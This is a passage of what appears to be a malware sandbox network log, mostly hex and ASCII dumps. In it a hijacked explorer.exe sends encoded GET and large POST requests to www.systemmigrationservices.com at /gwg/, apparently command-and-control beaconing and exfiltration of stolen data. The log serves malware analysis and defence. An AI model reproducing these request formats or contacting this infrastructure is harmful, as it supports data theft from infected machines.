dc 68 aa 19 dc fe 97 84 80 b8 d0 68 2a 12 1e a0 a3 97 57 83 93 93 6b f4 3f ef 3f bc 7b 8b ee de bf fb f8 e9 c3 e7 bb 4f ff fb fe dd 4d 2f 45 38 b8 29 d8 1d 07 5c 79 b1 84 29 68 7f 76 9c f2 3c ee f5 66 42 72 f0 7c c1 95 96 89 af a9 e0 d8 17 d1 31 ea dd ee c6 9d 0a ae 15 0e 85 08 19 90 98 aa fd 31 15 5e 18 15 1b 6c 1c c2 34 48 4e 34 38 c8 5c d6 c8 21 71 cc a8 4f 8c 58 3d a9 d4 2f cb 88 39 c8 aa 36 72 d6 b5 46 47 92 fc 9d 88 6b f4 3b 40 50 3d d6 e1 26 3d 7b 53 80 a0 e7 d4 b5 fd 61 62 dc 89 28 02 ae d5 13 e4 f1 33 94 8a 60 2f 5e dc 28 5f d2 58 67 67 a2 61 a9 7b 7f 91 39 49 57 8d 51 bd 78 b1 a0 3c 10 0b 3c 5e c4 10 89 bf e8 47 d0 9a f2 50 a1 11 7a 70 26 44 c1 67 c9 9c 61 66 62 5f 7b 5f 7b d9 05 7c ed d1 88 84 a0 be f6 7c 21 e1 6b cf 22 7f ed 9d 0c 70 1f f7 bd 93 af bd cb c1 f2 72 f0 b5 e7 b8 0e 2c b5 33 74 70 cc 43 c7 75 d4 3c 7c 2e 45 35 0f 2d 3d 35 0f df a6 24 d5 dc 92 14 89 f4 c1 19 3e 38 be e0 3e d1 56 94 4c e6 a1 11 b9 dd 52 bf f6 16 b1 47 b9 cf 92 c0 a8 f1 97 b2 0b 16 d9 93 c0 80 28 c0 11 e5 f8 2f f5 eb 1c e4 e8 1c 9f e1 33 e7 f1 f1 da 1c 5a ef 5f 87 e8 d3 8c 2a 64 dc 10 51 85 48 a2 85 17 02 07 49 34 04 e8 5f 3d 03 75 38 4d b8 75 8c 0e b8 c4 d5 dd 87 39 91 48 ba dc 15 2e 75 e3 11 c1 be 04 a2 e1 2d 03 73 d9 1d c7 27 7c 4e 94 d3 75 d5 28 c6 21 e8 3b 13 21 96 fa e8 a8 fa d4 71 06 81 d3 bd ce 49 23 bf 03 39 69 32 fa a8 25 e5 21 9e 4a 11 dd cd 88 bc 13 01 5c 2b ec 33 20 f2 03 f8 ba d3 77 fb 6e 8c d3 18 13 e3 19 d0 70 a6 bb ae c2 53 ca d8 27 58 ea 0e c1 c6 71 56 1d 3d a3 ca 85 ae db 77 fb dd 6b 2b f6 28 c6 5a fc 46 34 f9 fc e1 8f 4e f7 5a 82 4e 24 47 cf 27 ae 53 e2 ae 1c 8d ea a4 1f 0b d5 58 07 ba 0f 74 da 39 54 df bf 1f 96 42 76 53 de 87 27 d7 6a 41 b5 3f eb 28 6c 8e e9 3f 44 01 a3 1c 46 8e 16 b1 63 94 12 26 ba 5e f4 fb e8 74 10 2f d1 1b 49 09 73 5c e8 3e f8 44 81 33 65 24 74 86 19 29 bf f3 e5 64 70 f9 fa ea d2 bd 38 ef 9f be 76 af 06 fd 73 f7 f5 d5 eb f3 f4 f9 de 5d db 3e ad 6e 77 8f 8e 3a 87 7e e7 cb f9 f9 e9 f9 85 7b 7e 71 35 b8 70 8b df 27 af ef dd da ce d5 a0 7f 5a db ee 1e 1d 55 b0 2f 4f 4f 07 ee f9 c5 c9 e0 ca 3d bf 38 1b 9c 96 bf 4f cc 4a be 7e 52 fe 3e ed 97 bf ab f0 67 97 25 67 4b 35 e5 5c 90 38 35 7a d6 e9 d7 17 06 27 0d 88 d3 7e 63 61 d0 a4 71 76 79 df ed 5e db 13 ce fc b0 3c 62 73 24 97 56 a9 Data Ascii: fad;r8WLIH{2t[LeyJ\<6j)~NQELGAp>tM F=r>ruN"9sXH _p\lQN5%S>a0:T6rb)f#gu^!2-wb^hhWk??{OM/E8)\y)hv<fBr\|11^l4HN48\!qOX=/96rFGk;@P=&={Sab(3`/^(_Xgga{9IWQx<<^GPzp&Dgafb_{_{\|\|!k"pr,3tpCu<\|.E5-=5$>8>VLRG(/3Z_*dQHI4_=u8Mu9H.u-s'\|Nu(!;!qI#9i2%!J\+3 wnpS'XqV=wk+(ZF4NZN$G'SXt9TBvS'jA?(l?DFc&^t/Is\>D3e$t)dp8vs]>nw:~{~q5p'ZU/OO=8OJ~R>g%gK5\85z'~caqvy^<bs$V
Nov 28, 2020 10:26:01.957678080 CET	7922	IN	Data Raw: b3 5c ff cb d3 b3 41 7a da 66 d3 e8 77 d1 3f 2f 17 d6 a1 fb 99 4a eb 3b 96 4e 7a b0 15 3a e9 c2 3a 74 ff be fb 98 db 51 69 71 81 b1 38 63 ee 7a dd 3b b3 a0 d9 bd d6 58 49 7f 04 ae c6 01 4c 41 8e 34 4e 53 4e 33 bc ba c4 38 71 e6 dd ea 3f ab 4f 24 Data Ascii: \Azfw?/J;Nz::tQiq8cz;XILA4NSN38q?O$\|G"8\p_w3>N)u5VIl*5z9QnvCg?b73]_~T/~:o<.JQRqSaG#CSTJg?aE(`5:<q5
Nov 28, 2020 10:26:01.957695007 CET	7924	IN	Data Raw: 1e c1 d3 ae 20 16 ca b4 24 32 22 da b3 6d 8d f7 77 22 74 d3 34 55 32 19 4f 85 d0 20 37 a9 dc 2a f1 82 06 21 e8 71 2c 45 90 f8 7a 9c c6 2c 44 70 7a 61 4d 97 69 87 7e 0a 2c e5 71 a2 bf a4 d9 3b 8d 8c c7 f7 1b b8 64 b2 6c 8d a3 26 d6 7b 3c 89 26 20 Data Ascii: $2"mw"t4U2O 7*!q,Ez,DpzaMi~,q;dl&{<& '!f+d^g=T5WU/bzZ:d.6ox@dP\|!Rgj3}xT{(\|L!zk`c#TMLa{/FVF@td@5EOBqm#g&8i\|[
Nov 28, 2020 10:26:01.957707882 CET	7924	IN	Data Raw: 3f ba 85 a2 0d a1 d7 e8 16 80 4f a4 5b 2a ba 37 87 12 a5 95 57 d5 c5 b7 1d cd 46 b8 bd a8 16 fa 36 c4 6e 52 2d e0 9e 46 b5 d4 71 5f fa 25 46 c6 a9 8c 6b 8a f2 90 81 97 a5 4a f3 6e 34 2f 0d 10 4e 27 6e 2a 89 cc db 6b 84 a7 8c a8 99 79 c9 53 fe 57 Data Ascii: ?O[7WF6nR-Fq_%FkJn4/N'nkySW"L=554Qck}$wP`MVlkP+dNZUVWK=Uag<j?T/P2"!XjgNG)nV.]cZFQR)Jam,
Nov 28, 2020 10:26:01.984627962 CET	7926	IN	Data Raw: 37 65 37 0d 0a cc 5c dd 6f db 36 10 7f 76 fe 0a 56 7d e8 36 8c 96 e5 af 26 9d a2 21 48 0d 2c 40 9d 06 49 ba 3e 14 45 40 5b 74 a4 44 96 34 4a 8e 92 0d fd df 87 e3 87 44 4a 8a a3 62 4e 33 bf c8 e2 c7 dd 8f 77 e4 91 92 ee 6e 8b cb be 78 8c ca c2 bb Data Ascii: 7e7\o6vV}6&!H,@I>E@[tD4JDJbN3wnx\|g*<>@7t+6=t?EDbB%uDl.DP_<sOdv6^HP4<vR1v`pyDy
Nov 28, 2020 10:26:01.984657049 CET	7926	IN	Data Raw: 41 63 43 27 da 64 2d 7b 6b 53 10 4e c6 44 46 09 29 c1 70 4d e8 03 d5 83 87 54 23 45 4c 4c 3a 75 a7 ae c6 dc 55 d1 46 b2 ab 6a a3 ae 82 5d fd 4c d8 34 e0 86 04 cc ce f2 98 65 4c 21 68 51 16 88 83 4d 6d 92 19 2d e0 c6 0d c6 de 19 6c 1c e8 94 47 10 Data Ascii: AcC'd-{kSNDF)pMT#ELL:uUFj]L4eL!hQMm-lGv0T")hP~wMM)6\3vxZXC'NUTarvTyV.;n6fi3;1g@0mshjN!{,s$'\Mk:>j5:?"K2!V*5
Nov 28, 2020 10:26:02.036562920 CET	7928	IN	Data Raw: 37 33 33 0d 0a dc 5d 6d 6f e2 46 10 fe 4c 7e c5 ca 27 35 17 e9 1c bf 00 81 5c 1d aa de a9 ad ae 52 9b 56 ca f7 c8 18 27 b8 31 36 b2 4d 20 ff be 9a 99 7d f3 0b c6 27 20 9c f8 14 62 2f b3 b3 cb b3 e3 d9 67 c6 b3 15 67 c9 b3 12 1f e9 57 e5 c9 a0 5b Data Ascii: 733]moFL~'5\RV'16M }' b/ggW[M1>N?(AAWJVFU%YDr.eG6Yfa2"23d.M^2Mcw(*?[rI;M
Nov 28, 2020 10:26:02.036585093 CET	7928	IN	Data Raw: a3 f8 72 e2 51 9d b2 8a 30 b4 a0 97 e8 80 68 d3 25 ba c2 04 65 38 a8 72 96 07 fe 32 a4 76 32 eb 6f d7 cb 54 a1 39 5d 45 f1 cc 7c 03 db 99 c0 51 87 3a e3 6c d6 c8 18 eb 72 e2 45 8b 67 86 a7 d9 dc 19 ce d0 36 18 1d 79 c3 ff 81 37 b8 f0 14 c1 d6 74 Data Ascii: rQ0h%e8r2v2oT9]E\|Q:lrEg6y7tzjevtn:C{mIL6Wk0?.^/;LS7}g]`4FCs6KA9C{bm?oF}/c?!?*xdx7yzTTk_07wp@
Nov 28, 2020 10:26:02.053273916 CET	7930	IN	Data Raw: 34 63 32 0d 0a ed 9d 5d 6f a3 46 14 86 ef f3 2b 46 b3 6a ae 82 01 27 d9 4d 1c 1b b5 89 5a a5 17 e9 56 d9 f4 a2 57 2b 6c 8f 31 0d 30 88 c1 49 b6 bf be 7a cf 7c 30 38 4e ca ae 5a b9 52 73 11 89 b1 87 73 86 61 80 e0 f3 9c f7 74 a4 c0 76 64 64 bf 81 Data Ascii: 4c2]oF+Fj'MZVW+l10Iz\|08NZRssatvdd#=tQ~JJKSp=N<c)'V#?8F^e!O.Dstv;wnE%diY_[pDs^SnxkD%-r]~n-x'm
Nov 28, 2020 10:26:02.053294897 CET	7930	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.6	49763	213.171.195.105	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 28, 2020 10:26:39.823323011 CET	7970	OUT	GET /gwg/?1bj=jlNDBdXxM&pPU=lb/SWHpKCmsmK+u5QR6+71VT1RCMiNBNQ95QwlYjM9FeW5Wl/GojsaK+wOwJlCTaA7k0MtpWEA== HTTP/1.1 Host: www.systemmigrationservices.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Nov 28, 2020 10:26:39.854322910 CET	7970	IN	HTTP/1.1 200 OK Server: nginx/1.16.1 Date: Sat, 28 Nov 2020 09:26:39 GMT Content-Type: text/html Content-Length: 1358 Last-Modified: Wed, 02 Sep 2015 09:53:51 GMT Connection: close ETag: "55e6c72f-54e" Accept-Ranges: bytes
Nov 28, 2020 10:26:39.854417086 CET	7972	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 20 74 79 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <style type="text/css"> html, body, #partner, iframe { height:100%; width:100%; margin:0; padd
Nov 28, 2020 10:26:39.854598045 CET	7972	IN	Data Raw: 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: </body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.6	49766	213.171.195.105	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 28, 2020 10:26:41.887763023 CET	7993	OUT	POST /gwg/ HTTP/1.1 Host: www.systemmigrationservices.com Connection: close Content-Length: 413 Cache-Control: no-cache Origin: http://www.systemmigrationservices.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.systemmigrationservices.com/gwg/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 70 50 55 3d 74 35 7a 6f 49 6e 4e 5f 65 33 34 6f 59 70 62 4b 4e 30 50 37 37 43 68 33 77 6a 7e 71 70 4e 55 47 55 49 63 54 70 33 30 46 63 59 49 5a 45 36 37 68 7a 6b 41 37 6d 61 44 6e 72 50 67 58 30 78 6a 65 48 37 6c 76 4a 65 56 34 46 66 7e 4c 33 54 78 41 57 33 33 56 51 62 28 46 4f 59 74 58 44 32 32 55 57 6f 72 78 4a 6e 68 75 53 67 4a 4f 74 41 4d 7a 70 49 6a 35 58 54 36 4f 6e 57 72 37 30 76 55 4c 4f 63 52 64 4d 45 32 78 4c 4c 7e 61 38 66 33 4d 77 4a 57 41 79 47 7a 61 6a 42 36 55 62 76 67 6c 56 36 5a 56 76 72 4b 47 48 6f 41 6d 4d 38 6d 45 55 52 6c 5f 51 57 43 32 53 78 31 39 47 55 7a 6d 6c 55 79 76 78 4c 57 47 59 65 51 4b 52 76 36 73 32 48 4b 76 73 79 58 52 71 49 47 65 43 7a 36 65 70 39 32 4b 61 4e 38 46 70 71 62 35 77 49 32 37 72 75 49 49 42 67 55 76 39 52 75 6d 7e 48 79 36 28 64 43 42 78 6d 39 30 76 48 4a 53 50 69 61 58 79 36 51 71 43 4d 4e 5f 28 43 62 52 7a 55 33 54 64 53 75 4c 45 46 31 39 69 72 59 4e 28 6c 6b 4c 6a 6e 6f 6b 28 68 73 79 44 4e 69 56 49 73 49 35 6d 78 4a 56 4f 32 75 4e 48 6b 4f 65 54 2d 79 71 6d 66 6c 57 79 54 62 45 79 58 35 4e 6c 6d 67 32 55 78 44 34 4d 52 51 37 4c 5a 53 48 55 4a 6f 48 71 44 65 6c 46 33 72 7a 77 63 69 6b 4c 61 56 6e 7e 73 4b 4f 56 50 68 30 39 74 66 34 49 61 42 42 59 5f 36 74 44 5a 63 2e 00 00 00 00 00 00 00 00 Data Ascii: pPU=t5zoInN_e34oYpbKN0P77Ch3wj~qpNUGUIcTp30FcYIZE67hzkA7maDnrPgX0xjeH7lvJeV4Ff~L3TxAW33VQb(FOYtXD22UWorxJnhuSgJOtAMzpIj5XT6OnWr70vULOcRdME2xLL~a8f3MwJWAyGzajB6UbvglV6ZVvrKGHoAmM8mEURl_QWC2Sx19GUzmlUyvxLWGYeQKRv6s2HKvsyXRqIGeCz6ep92KaN8Fpqb5wI27ruIIBgUv9Rum~Hy6(dCBxm90vHJSPiaXy6QqCMN_(CbRzU3TdSuLEF19irYN(lkLjnok(hsyDNiVIsI5mxJVO2uNHkOeT-yqmflWyTbEyX5Nlmg2UxD4MRQ7LZSHUJoHqDelF3rzwcikLaVn~sKOVPh09tf4IaBBY_6tDZc.
Nov 28, 2020 10:26:41.918081999 CET	7994	IN	HTTP/1.1 405 Not Allowed Server: nginx/1.16.1 Date: Sat, 28 Nov 2020 09:26:41 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.16.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.6	49767	213.171.195.105	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Nov 28, 2020 10:26:41.920929909 CET	8007	OUT	POST /gwg/ HTTP/1.1 Host: www.systemmigrationservices.com Connection: close Content-Length: 150725 Cache-Control: no-cache Origin: http://www.systemmigrationservices.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.systemmigrationservices.com/gwg/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 70 50 55 3d 74 35 7a 6f 49 69 78 72 59 58 38 31 66 63 72 4c 4d 6b 66 6a 73 79 51 70 79 55 75 35 67 5f 46 33 4b 72 5a 59 70 32 45 4a 46 4d 46 65 58 71 4c 68 31 6e 6f 32 6f 61 44 6b 74 50 67 55 6c 68 76 49 5a 63 67 69 4a 66 68 65 46 66 6d 49 73 68 70 46 53 33 33 43 52 36 44 39 66 6f 52 41 44 30 7a 38 59 71 6d 69 44 48 74 75 63 32 68 4d 69 46 51 73 68 70 28 36 4e 44 6d 50 30 58 44 2d 30 38 52 2d 4f 2d 74 46 50 46 36 6b 42 64 4f 52 7a 5f 48 6b 36 36 47 46 74 43 62 5a 73 67 69 48 47 63 45 68 5a 62 59 31 7a 2d 7e 46 5a 6f 59 67 47 62 44 78 53 67 68 57 53 46 61 49 53 32 42 74 59 46 50 7a 32 43 32 33 32 5f 47 5f 54 4b 67 45 66 2d 36 6b 79 42 65 53 71 79 6e 75 31 37 53 37 49 44 58 63 39 5a 47 61 48 38 55 58 75 62 6e 31 6f 70 47 50 72 35 51 41 65 51 6c 4e 78 79 65 39 6e 45 71 69 38 66 75 33 31 32 38 53 70 48 4a 4f 48 41 79 6a 28 76 41 68 4a 38 63 76 67 78 37 50 35 6e 44 6f 4e 41 6d 4c 4a 42 70 70 6b 61 4d 37 31 30 55 6a 7a 57 39 71 7e 7a 78 53 52 64 69 55 62 2d 67 69 6d 78 4a 33 4f 79 37 51 47 52 6d 65 54 76 53 48 69 38 4e 43 7e 44 61 42 78 48 70 4c 7e 46 30 6d 55 78 4c 34 4e 6b 55 52 61 36 79 48 44 76 55 49 71 6e 4b 6c 43 48 72 7a 72 4d 6a 78 45 49 67 71 79 74 62 4f 64 4e 70 6c 73 66 66 47 50 71 4d 64 66 4e 32 6d 55 74 67 68 62 4e 39 76 37 58 78 77 77 38 7e 67 72 6e 49 4c 68 59 37 71 31 4d 32 73 42 66 6b 6e 42 4b 68 52 4a 64 62 31 59 6f 4e 6c 43 4a 75 33 74 53 52 71 42 36 74 6f 72 79 41 65 6b 43 42 7a 68 37 7e 4a 59 63 4c 68 45 78 34 73 51 42 5a 49 6d 71 6c 34 63 4d 4b 34 63 4b 6b 41 48 37 65 32 50 75 41 43 58 4b 67 34 76 33 7a 56 69 47 57 44 33 2d 62 36 44 64 38 79 59 65 7e 30 52 4f 37 63 70 53 46 62 43 46 55 50 68 39 52 78 4d 58 52 7a 4e 53 5a 75 54 41 6d 59 53 45 6c 62 4c 31 6e 55 63 75 41 4b 71 65 31 42 4b 56 74 50 4c 6e 79 78 6e 5a 32 54 58 74 4a 4b 72 46 6a 34 62 4d 51 73 43 77 61 67 43 35 37 4a 45 74 6b 33 46 49 70 48 58 32 34 37 72 36 78 39 58 69 4c 43 6c 73 73 6e 44 38 7e 69 31 49 7e 6c 47 75 50 6c 65 39 42 7a 41 59 39 64 51 32 32 47 61 30 67 5f 4a 63 77 73 31 36 44 6e 66 56 5a 6f 32 49 71 48 68 4b 6d 67 45 42 45 65 56 61 6a 30 4c 35 6a 64 71 6f 51 66 54 73 6d 34 52 57 72 78 70 44 6b 33 77 61 4b 65 4e 58 4a 34 54 54 28 33 68 5f 48 50 6a 7a 72 67 68 4e 6a 74 50 4b 38 59 72 46 73 4c 6e 64 71 79 63 71 45 72 33 30 59 75 71 59 44 5f 7e 56 50 4e 4a 35 42 4c 53 5a 74 2d 61 49 68 31 42 39 32 63 47 6a 71 4c 31 6e 35 63 61 57 74 76 63 4c 59 55 55 74 7e 59 41 33 41 68 7a 61 4b 47 37 55 35 35 31 31 56 66 45 37 4e 75 30 64 37 53 46 48 55 4e 31 38 30 38 59 53 6d 6c 4e 65 4a 65 61 63 44 72 30 64 73 47 6d 41 37 50 38 5f 78 6a 45 59 53 5a 58 74 28 70 58 33 79 6c 7a 6c 71 37 7e 41 6c 47 68 56 68 63 71 31 37 53 38 34 36 69 7a 6a 6b 73 69 36 69 6d 73 35 36 63 56 79 33 48 74 2d 33 71 45 6c 72 72 51 38 39 52 30 6d 77 56 54 33 7e 62 47 48 66 4a 4f 78 73 2d 6f 48 58 6b 37 41 47 61 4f 5f 42 34 30 53 6f 6c 4c 65 69 44 79 63 45 63 4a 65 65 71 4a 66 41 55 70 6f 5a 43 30 73 61 46 7e 76 45 77 78 32 50 53 6e 43 30 52 33 42 49 56 6d 50 38 50 77 70 50 32 75 2d 6c 62 28 52 4d 58 33 4d 42 2d 5a 44 49 42 4a 46 67 56 71 51 57 6f 4a 36 36 78 30 4b 6f 56 6b 68 53 32 63 65 79 68 78 47 72 58 47 43 31 44 63 4e 77 76 79 73 4e 38 73 4a 4a 4c 50 79 4b 78 67 72 61 69 34 73 78 43 7e 64 6c 78 56 66 69 57 4e 48 30 65 42 61 46 6f 42 67 30 2d 35 78 37 61 54 38 77 52 50 55 45 30 75 41 54 47 4b 38 31 32 33 46 73 50 6f 6e 4d 5f 57 48 52 46 63 53 73 2d 77 2d 58 7a 62 33 6e 6b 42 54 4a 6f 35 5f 75 36 35 5a 59 68 48 50 65 30 75 36 59 46 55 30 78 77 43 70 4c 51 46 32 35 47 5a 44 6d 75 44 4f 6e 38 63 69 47 41 35 46 34 48 48 4f 61 50 33 43 69 4b 64 71 78 62 38 42 43 44 76 52 70 76 4e 4d 63 43 6b 4c 6e 43 6f 59 64 44 4d 76 37 4c 6a 30 58 66 43 67 31 4b 66 59 6f 6b 38 42 37 71 5a 76 7a 4a 32 76 4e 2d 5a 35 48 4d 6a 63 6a 45 71 72 76 35 57 68 74 52 4f 6d 76 65 53 74 32 4e 56 34 4c 71 4f 43 31 43 52 39 6e 7a 79 55 68 30 55 49 66 74 43 30 6e 33 45 52 6a 79 76 33 52 44 43 58 74 4f 66 32 49 65 32 73 61 55 68 64 59 71 6a 38 4e 70 6f 30 68 38 38 39 44 6c 38 45 58 64 44 62 58 52 45 6c 30 35 76 78 53 34 54 78 6c 38 77 75 28 45 72 63 59 6d 35 77 49 50 6a 67 67 77 35 71 6e 59 77 57 68 Data Ascii: pPU=t5zoIixrYX81fcrLMkfjsyQpyUu5g_F3KrZYp2EJFMFeXqLh1no2oaDktPgUlhvIZcgiJfheFfmIshpFS33CR6D9foRAD0z8YqmiDHtuc2hMiFQshp(6NDmP0XD-08R-O-tFPF6kBdORz_Hk66GFtCbZsgiHGcEhZbY1z-~FZoYgGbDxSghWSFaIS2BtYFPz2C232_G_TKgEf-6kyBeSqynu17S7IDXc9ZGaH8UXubn1opGPr5QAeQlNxye9nEqi8fu3128SpHJOHAyj(vAhJ8cvgx7P5nDoNAmLJBppkaM710UjzW9q~zxSRdiUb-gimxJ3Oy7QGRmeTvSHi8NC~DaBxHpL~F0mUxL4NkURa6yHDvUIqnKlCHrzrMjxEIgqytbOdNplsffGPqMdfN2mUtghbN9v7Xxww8~grnILhY7q1M2sBfknBKhRJdb1YoNlCJu3tSRqB6toryAekCBzh7~JYcLhEx4sQBZImql4cMK4cKkAH7e2PuACXKg4v3zViGWD3-b6Dd8yYe~0RO7cpSFbCFUPh9RxMXRzNSZuTAmYSElbL1nUcuAKqe1BKVtPLnyxnZ2TXtJKrFj4bMQsCwagC57JEtk3FIpHX247r6x9XiLClssnD8~i1I~lGuPle9BzAY9dQ22Ga0g_Jcws16DnfVZo2IqHhKmgEBEeVaj0L5jdqoQfTsm4RWrxpDk3waKeNXJ4TT(3h_HPjzrghNjtPK8YrFsLndqycqEr30YuqYD_~VPNJ5BLSZt-aIh1B92cGjqL1n5caWtvcLYUUt~YA3AhzaKG7U5511VfE7Nu0d7SFHUN1808YSmlNeJeacDr0dsGmA7P8_xjEYSZXt(pX3ylzlq7~AlGhVhcq17S846izjksi6ims56cVy3Ht-3qElrrQ89R0mwVT3~bGHfJOxs-oHXk7AGaO_B40SolLeiDycEcJeeqJfAUpoZC0saF~vEwx2PSnC0R3BIVmP8PwpP2u-lb(RMX3MB-ZDIBJFgVqQWoJ66x0KoVkhS2ceyhxGrXGC1DcNwvysN8sJJLPyKxgrai4sxC~dlxVfiWNH0eBaFoBg0-5x7aT8wRPUE0uATGK8123FsPonM_WHRFcSs-w-Xzb3nkBTJo5_u65ZYhHPe0u6YFU0xwCpLQF25GZDmuDOn8ciGA5F4HHOaP3CiKdqxb8BCDvRpvNMcCkLnCoYdDMv7Lj0XfCg1KfYok8B7qZvzJ2vN-Z5HMjcjEqrv5WhtROmveSt2NV4LqOC1CR9nzyUh0UIftC0n3ERjyv3RDCXtOf2Ie2saUhdYqj8Npo0h889Dl8EXdDbXREl05vxS4Txl8wu(ErcYm5wIPjggw5qnYwWh8yGwQbrA9vX(geysvdum8NSTG6-rhIH5y~7YikRNZEaR_xiDZlE8b0OB1B9kUI6PvNXCcXtTY1UzBG5TWsaA51NquxFYwUVIiCoDZmvqaGJ0XK27AuyAhZw~5sSfDjGfLRraPcezGmAwWKsiPrTt6~BSxLdlAvr5ozPRykIZeiMEN(CF9PFG22uCDUlkQE1(4kPUQ8hcVrBt8aR4OD1HWpHxoETQ6tsGeKroS85pdCOaXOem9rDuboHBWGRrmBmORxAMGjlftMrF5A4LAjxnwbyfN(eMvXONyt4IJf9e-HI8xP-16TyB5Yyll93CXBmTqUrCO4N6G6YmBurS4WEmb4ByLQzj-~h(JcfsBI9MXcNFEECp1yRjKNjQiJ0nGxmAeF39cXL38Y24OPOancaTG~FPYi3qdOyv-oLpl439EM0KmaLmGpU6CzQW7S9~AUHYldQk92cJ1RXU_ZNdb61L3qIHbtXxDvPD266Rj5Ti1pWY8W-nMCTXfVnms7WN0HHf0sUKm6Wjz4MjgJ6e5ud3xxXf1SUuyZrz0YRHRRRMUIgdP470l2IdIacfTGJ(XxwAkj7O2vkVtg6fYCur9trkDTc85Yv(Ggc13iYpDKrDFkRYpEF1iBQDozYnSgvrSuCu0YOR1GFL-H1wF8_4uiblR~nnaISDUGnXMm_kfB-Tco7pJ5oaEfEjr5xAEupBwyYj0G5afmuBHhdvxw1xE4XTSCoOLfjYlxZXwqgTcMPpLHkozkmKFuJwyUm9AaJv67vnEEOJKQyGjrGqa2sRG1i8FhdKc9F8G8FMj5zs9yxuYYjht9MUsgImjBGliLLDm(VM_dDsxNk60ABDfzc4tmAczH7~H~zi8tCHhn9KQuNvKZgqWPV8nh1EbZomJ4dbbFXUYgWE5ivBpUdiH4DXOLQziYsyWPFG9gmiqOZoQhzotYH~Z6QjEXnWFX5gUI_gCyxuC6A8LOR92jSsLeOXy1nTe7r46PACJY4KJL2lCWCdQ8g(FME4B8Vt7bqXiw6LQSoG0YSgBxSbSirHIXtsoscruWdjrnVLPp8Hsyu7aSt(Z9IVYDucK0LG2jnhuWkeZPqluwqJDNXQRzt5LCw5Ow5k7caiV0MQn8Q(krF8Cg8kWcMFoGpgrYpGxJcur03RORmq6l20MnCAiQOA7S12ZUI6Qtg8rRDbtoIC085sMLEewiZkQR8aSoL8dskWJuWWGF2APLm6QKCHroTkMIoSRrdgZVsdRyUjMcOtYRjk6kzkjV_bOMOEQgZZgFNfb(7HzEZTxgCwdEMOzPLGYZJcaC9d5uQhzJ615NgN_YK3dRUeo4Dp9tWmrMQKgx0R76qWTW6g_25DASfUn0JDQAHpB(Mzq8JbzJHo0w8c6V1AUywf2ymx-C9jys04gdbMBAv8Bv5UTYHgX4Z482BkVfIOP~z7bM5(fMxY2XZe9KXq2xnKniY8QNwOtV7~mvPp9UA9pTl(mnfk9dO5CTROWYHmJ09Y9G8u1R4dhU6txa64MysbG~n1sE22Ujh1RZGz5~n60Xvh5lwyRxkhbBbq77rbVa7Ou7dYoDRwTmnsOLwt88iVdfQ2wC4OrUFIOChKOKgShMOtyb6NIU7qbxoFlavViinz7IjlLU6B0RL98zfKoeOKQThnKuJ3fnk(PB8XDK8dle97QhACXIe6eQc~_5RiDV5cS38Rg78ammeF4875fGArd2T6sG7vh9CUK3Z9v83tdFu~B~boEa-YAAMD8OF(X1oDZ7uWoIpkuRRK322~zS9Ff4n6pyDPo~hNlpHKihxRfuWkXmIXE15lW5IlSz-gNSFuFnUwAPHZOV8H_P2kCOc8KnQaVI4(L5HQXCMvgeuNcCO57smN8SKm70nUwtPwScYMQ0dMW1gFY5-ubU5ihMLtBHJaQH8jYn-(4BtasTyKngsuGnB4z4oBoTuSJV8cbl5FI~q096mwuRva9QXZsYt4gQDj-6pT-O-9st8g1Jo7XBiTn9lSIM2Eikh5xAvtXm6AzEvIrfFMej7U_RDUhuaknYy5rCyzoFuChnS6x3yfw6z36G-sAatumLH1omi3u9W7c95jglUXUb1LB3eQZnx0Zsp067Y9JP2g1CJA_t2u-WIg3rFlqNkyOPy1ArQ(0y-l1EpoT~EMfD7muv2Q1GgsFa7M7SXH4i9EeIBQS6KrccLvB3Z28YM17H8JeQ83Mw5Vak3kPfktI~Q9rDusv3YikayWgmXVLPxHh4QAaHI7sgLVVIeenp_X222d0qWryBNR-TuCpp80DbJRQ7U9MXF3vHlu8ShwFoU3UYOnc9mJq2f0eQULGkzDrcbwv14a9~aVP1aXq8nbSxhGyr5FZ6pDDCERScMikH0YTdIXFeRnKcgAhZ6(CrJNg0Yq3FuJaUw5BNrZ2Zh0S(MjgbmZlv6jk~iCB~O73m5mBuwxK0ZFurGvKUcjO